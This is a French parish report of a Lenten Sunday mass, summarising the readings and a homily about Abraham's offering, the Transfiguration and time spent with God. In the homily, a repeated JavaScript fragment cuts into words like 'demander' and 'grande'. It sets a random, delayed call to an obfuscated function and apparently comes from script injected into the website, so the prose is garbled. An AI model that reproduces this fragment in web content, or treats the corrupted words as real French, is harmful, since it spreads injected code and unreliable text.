La messe de 10h :00 a été célébrée par le Père Herménégilde COYITUNGIYE.  Les textes lus ont été respectivement tirés de : Gn22, 1-2 .9-13.15-18 ; Rm8, 31b-34; et Mc 9,2-10.

Lors de l’homélie, le célébrant a commencé par rappeler que la Parole nous dit que DIEU est toujours avec nous et qu’il nous appelle d’aller à sa rencontre à la montagne. Afin de faire mieux comprendre ces lectures, il les a expliqués en deux parties:

  1. LA PERIODE DU CAREME: C’est le temps de se repentir. Ici nous pouvons nous demdom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander comment Abraham a donné son fils comme aumône. Il ne s’est pas trop demdom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andé, il n’a fait que ce que DIEU lui a demdom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andé de faire. Souvent nous oublions que c’est DIEU qui nous a donné tout ce que nous avons. Nous connaissons bien les techniques de demdom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander, il nous faut bien apprendre les techniques de donner. Abraham voulait donner son fils, sans peur, il voulait accomplir ce que DIEU lui a demdom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andé. Que pouvons-nous faire ? Heureux est celui qui est digne est fier de ce que DIEU lui a donné.

 

  1. LE MONT TABOR NOUS INITIE A MONTER LE MONT DE GOLGOTA: Il nous est très bénéfique de prendre souvent du temps pour les pèlerinages, d’aller loin de ce qui nous éloigne à DIEU, pour que nous puissions prier comment Jésus aimait aller dans les montagnes. Il nous faut prendre du temps pour écouter DIEU. Les réseaux sociaux occupent une grdom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande partie dans nos vies. Pourquoi ne pas utiliser ce temps pour aller à la rencontre avec DIEU. Seul Jésus peut soulager les gens, les détenus, les malades, ceux qui sont fatigués …

La sainte Vierge Marie a tout laissé pour que la volonté de DIEU s’accomplisse, si seulement nous pouvons être comme elle a t-t-il conclut.

En outre, dans cette messe le célébrant nous a présenté la commission des lecteurs de la sainte Ecriture lors des célébrations liturgiques. Et après la messe, comme c’était le dernier dimanche du mois il y a eu un pèlerinage vers le sanctuaire de la paix et réconciliation de Mont Sion Gikungu.